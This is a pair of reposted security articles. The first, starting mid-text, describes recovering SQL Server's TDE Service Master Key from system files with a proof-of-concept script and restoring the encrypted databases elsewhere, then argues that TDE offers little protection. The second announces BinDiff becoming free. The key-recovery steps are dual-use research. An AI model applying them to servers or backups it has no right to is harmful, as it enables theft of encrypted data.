DPAPI structure always includes a provider GUID: df9d8cd0-1501-11d1-8c7a-0c04fc297eb which makes them easy to find. Since the master database is unencrypted we could just use SQL server to extract them, but that would require a bit more coordination and fiddling. Because the GUID is so definitive this quick and dirty approach of searching directly in the master database is used for the proof of concept instead. It also means it works equally well with either SQL backup files or native .mdf files, despite the file formats being different. Execution just points to the necessary files, and goes something like this: $ ./tde.py --masterkey=S-1-5-18 --system=SYSTEM --security=SECURITY --software=SOFTWARE --masterdb=master.mdf The result is simply the unencrypted Service Master Key in all its naked glory: Decrypted service master key: 999338193ab37c38c3aa99df062e2f5ca96b7dbc87542af9d61e0dc8a473c1f9 SQL Server has a way of backing up and restoring Service Master Keys, using the command BACKUP SERVICE MASTER KEY TO FILE = 'some-file-to-write-to' ENCRYPTION BY PASSWORD = 'some-password' And likewise, they can be restored onto a new server with the command RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' DECRYPTION BY PASSWORD = 'some-password' [FORCE] With the Service Master Key restored, the other keys in the master database can also be decrypted, and the database accessed. Unfortunately we don’t have a backup file of the Service Master Key from the target machine (actually in many attack scenarios we could just execute the backup command as well, but that doesn’t work for backup restores and some other scenarios). In our case, where we have a recovered raw key but no backup file, an obvious way to install the SMK would be to encrypt the SMK with DPAPI system credentials on the recovery computer and store in the master database. The dpapick library doesn’t currently support encryption and I was in a hurry so I skipped this method for now, though it probably wouldn’t take much effort. Instead, I went for a quick and dirty method that creates a SMK backup file but it is a bit manual. So this can undoubtedly be streamlined, but for the proof of concept I used a simple cuckoo’s egg method that is shown in the video as part of an end-to-end recovery demo. This method generates a SMK backup file with the recovered key, which we can restore onto our recovery SQL server. Armed with the new Service Master Key backup file, the steps to restore a TDE backup (from .bak files) to the recovery server are: RESTORE DATABASE MASTER FROM DISK = 'c:\...\master.bak' WITH REPLACE; RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' DECRYPTION BY PASSWORD = 'some-password' FORCE Start SQL server in single user mode (-m startup option) Restore master database Restart SQL service (still in single user mode) Add administrator user/reset admin password. Restart service in normal multi-user mode Restore SMK with the FORCE option Restore the target database(s) Refresh database list In the case of restoring from .MDF/.LDF files, the steps are: RESTORE SERVICE MASTER KEY FROM FILE = 'some-file-to-read-from' DECRYPTION BY PASSWORD = 'some-password' FORCE Stop SQL service Copy .mdf/.ldf files, replacing existing master database Start SQL server in single user mode (-m startup option) Add administrator user/reset admin password. Restart service in normal multi-user mode Restore SMK with the FORCE option Take target database(s) offline Bring target database(s) online again Refresh database list At this point, we have fully recovered and have access to the encrypted databases. Encryption of Data at Rest in General There seems to be a tendency to just assume encryption is a good thing without considering specific attack scenarios, but doing so is essential and also very revealing. For example, here are some common attack scenarios and details on how well TDE helps with the situation. For comparison purposes, application based encryption protection is described for each attack scenario as well. ATTACK SCENARIO TDE APPLICATION ENCRYPTION SQL injection or similar SQL manipulation attack SQL server automatically decrypts data for attacker, and TDE provides no protection. Attacker can only retrieve encrypted data. Attack that provides local admin access on SQL server. SQL is configured to allow NTLM login for administrator. TDE does nothing. Admin can log in to SQL and view/export tables, make backups, export service master keys, etc. Attacker can also use TDE recovery method here. Attacker can only retrieve encrypted data. Attack that provides local admin access on SQL server. SQL is not configured to allow NTLM login for administrator. Attacker can easily acquire access for themselves as SQL admin and view/export data. Attacker can also use TDE recovery method here. Attacker can only retrieve encrypted data. Attack that provides application server admin access only (no access to SQL server). Attacker can exploit application to request sensitive data. TDE doesn’t protect data. Attacker can recover application encryption keys and exploit application to request sensitive data. Attack that provides application server access as low privilege user. Potentially protected, but true regardless of having TDE. Potentially protected, but true regardless of having application encryption. Attack that provides escalated access as local SQL service user on SQL server. Attacker can issue arbitrary queries and data is decrypted for them automatically. Attacker can only retrieve encrypted data. Servers stolen, hard drives stolen/recovered. or Complete backups acquired (no additional encryption or separation) TDE data can be decrypted as described here. Attacker can recover application keys and decrypt data. However it may require reverse engineering since the encryption is custom, so it is more difficult that in the case of TDE. System and DB backups are stored physically separately. Attacker can retrieve encrypted data or keys but less likely to get both. Inferior to conventional backup encryption though which entirely prevents this. Attacker can only retrieve encrypted data. Backups acquired, but additional encryption is implemented as part of backup process. Protected, but TDE doesn’t add any benefit. Protected, but application encryption doesn’t add any benefit. Attacker gains access to database files (eg on a vulnerable SAN), but not other system files (eg on a local disk). TDE provides a benefit in this case, but it is not always applicable. It is also preferable to arrange so any SAN is only physically accessible from the SQL server, in which case TDE doesn’t add anything. Attacker can only retrieve encrypted data. We can see that in practice for most real world attack scenarios TDE doesn’t help or provides worse security compared to other approaches that also have less system impact. Should I Install TDE? The weakness in TDE is not a bug or a fault of Microsoft; it is a much more fundamental problem, and it is not in any way unique to SQL Server. Any other database has to abide by the same logic. This is the result of people demanding features without understanding what they are asking for. Microsoft know it isn’t secure, and you can see this in some of the language they use in the documentation. It’s about satisfying political pressure not about solving real security issues. It is the same lack of understanding that perpetuates and pervades management best practices. People want encryption of data at rest, but also want automatic booting and conventional database systems, and don’t want to have to change their applications. The result is always going to be insecure. But they have their boxes to tick on their security checklists. As well as little to no practical security enhancement TDE gives you: Reduced performance Depending on your architecture and use patterns, this typically varies from 2% to 12% see http://www.databasejournal.com/features/mssql/article.php/3815501/Performance-Testing-SQL-2008146s-Transparent-Data-Encryption.htm However systems that are write heavy or that have wide data scans over data that are much larger than RAM may see 15% impact or more. Systems under heavy load may also degrade non-linearly. Uncompressible backups Since encryption occurs before backup compression, and encrypted data cannot be compressed, backups will be significantly larger. This has direct cost implications. Conventional backup systems compress before encrypting and avoid this problem. A false sense of security There are many situations in which TDE becomes effectively null and void. Unless great care is taken to avoid these the false sense of security is likely to lead unwary users to expose sensitive information that would have otherwise been protected with other more straightforward security methodologies. TDE offers little to no practical benefit. Given the significant downsides, for most situations it is not even practically useful as one component in a multi-pronged security approach. On the flip side of the coin, there are common arguments for using TDE: “It’s better than nothing”. No, it really isn’t… At least nothing wouldn’t make your system run slower and cost more to run. Other conventional security practices address the same threats more effectively and without the impact. “It’s one more layer”. It’s a layer that does nothing beneficial, but has unequivocal downsides. There is no rational basis for adding components to a system that reduce performance and increase costs for no benefit. “Encryption of data at rest is current best practice and required for security compliance in many industries like PCI”. This is politics more than reasoning. Also, TDE is not the only method of encrypting data at rest. Some other methods suffer fewer problems, as we saw earlier. “You’re assuming an attacker has administrative access, which is an unreasonable assumption. We want to protect against lesser privileged attacks.” Lesser privileged users shouldn’t be able to get your database files anyway. It’s always true that if an attacker has admin access, all bets are off. There are a lot of other terrible things they could do too. An admin user can always directly access SQL server, bypassing TDE encryption entirely. We’re really just showing that file access is sufficient, not that there aren’t also other weaknesses in this case. For any sensibly configured SQL server, no Windows users other than SQL user and local Administrator(s) should even exist. File permissions should also be such that no other users can read SQL data files, even if accidentally granted access to the server. SQL data files are also usually not readable to normal users because they are locked while in use. The only users that could realistically read the database files off a live server will be privileged users and they will be able to read all the other files too. But also importantly, we’re also considering the situation where backups, hard drives or servers are stolen, or some other access to the storage is obtained for unspecified reasons. So, should I install TDE? Probably “No”. Only if you’re forced to. If arguing will lose your job; probably “Yes”. Making the most of a bad situation (using TDE anyway) If political pressure is such that you have to install TDE despite it’s shortcomings: Ensure database backups are physically isolated from system backups or preferably Encrypt your backups separately, using alternative backup software encryption facilities (they don’t suffer the same problems as TDE). This somewhat defeats one of the purposes of TDE of course but at least avoids exposing yourself. Use hardware support to alleviate performance penalties or for key storage (see below), but this significantly increases costs even more and doesn’t help with security. Be aware of the situations it doesn’t help, and implement other strategies to deal with them. They will effectively make TDE redundant, but at least you ticked your boxes. Hardware Support Inexplicably, SQL Server doesn’t seem to support Intel AES-NI acceleration for AES which would greatly reduce the performance impact. There are vendors such as Thales, Townsend and SafeNet that provide hardware security modules (HSMs) that are compatible with SQL Server. The claimed benefits are hardware accelerated encryption and key protection. Hardware acceleration is great if you’re forced to use TDE for some reason. It should reduce the performance impact significantly. The security is questionable. I tried to get some information but had no luck getting responses. But there is a fundamental issue with hardware modules that integrate at the application level (as opposed to deep OS integration). The concept is that the HSM stores the encryption keys onboard and takes care of all encryption out of main memory and off-CPU. Without an audit, which seems not to have been done, there is no way to know how difficult it is for an attacker to recover keys from the devices. But more importantly, there is nothing stopping an attacker from asking the device to do the decryption for them. An attacker can send a perfectly valid request to the HSM asking it to decrypt a database block and end up decrypting the entire database. You might say that the HSM should only accept requests from SQL server. It’s not clear they attempt do that at all, but in any case, in order to do that, SQL server would need to authenticate itself to the HSM. At some point that involves a key, which it also needs to store somewhere, and we have the turtle problem all over. One benefit of an HSM is that it prevents SQL server storing keys on your hard drives at all. This means the keys aren’t stored in your backups. In practice though, this is of no real benefit since conventional backup encryption solves the same problem without any hardware or costs (and keeps backup size down, as mentioned earlier). So HSM is a sensible choice for acceleration in the case you are forced to use TDE, but don’t kid yourself into thinking it helps with security. If not TDE, then what? Application (column level) based encryption of data at rest is an alternative to TDE. It avoids some of the pitfalls, but requires support from application developers and may be expensive to retrofit to existing systems. Great care should be taken with access to servers and with file permissions. An unprivileged user should be entirely prevented from accessing database files. A privileged user will be able to decrypt and read encrypted data in all cases, so don’t dwell over it too much. The only thing you can practically do is keep the files away from unprivileged users, and try to prevent users from escalating by following other good security practices. Adding TDE on top of that won’t help a bean since an unprivileged user can’t get the data and a privileged user can read it despite TDE. Backups should be encrypted with an independent encryption system integrated into the backup system. Your permissions and other access controls should be audited automatically and frequently so that if an accidental change is made it can be fixed before it is exploited. Sursa: http://simonmcauliffe.com/technology/tde/

BinDiff now available for free March 18, 2016 Posted by Christian Blichmann, Software Engineer BinDiff is a comparison tool for binary files that helps to quickly find differences and similarities in disassembled code. It is used by security researchers and engineers across the globe to identify and isolate fixes for vulnerabilities in vendor-supplied patches and to analyze multiple versions of the same binary. Another common use case is to transfer analysis results from one binary to another, helping to prevent duplicate analyses of, for example, malware binaries. This also helps to retain knowledge across teams of binary analysts where the individual workflows might vary from analyst to analyst. More specifically, BinDiff can be used to: Compare binary files for x86, MIPS, ARM/AArch64, PowerPC, and other architectures. Identify identical and similar functions in different binaries. Port function names, comments and local variable names from one disassembly to another. Detect and highlight changes between two variants of the same function. Here is a screenshot demonstrating what using BinDiff to display per-function differences looks like: At Google, the BinDiff core engine powers a large-scale malware processing pipeline helping to protect both internal and external users. BinDiff provides the underlying comparison results needed to cluster the world's malware into related families with billions of comparisons performed so far. Ever since zynamics joined Google in 2011, we have been committed to keeping our most valuable tools available to the security research community. We first lowered the price, and today we are taking the next logical step by making it available free of charge. You can download BinDiff from the zynamics web site. It’s the current version, BinDiff 4.2 for both Linux and Windows. To use it, you also need the commercial Hex-Rays IDA Pro disassembler, 6.8 or later. Happy BinDiff-ing! Sursa: https://security.googleblog.com/2016/03/bindiff-now-available-for-free.html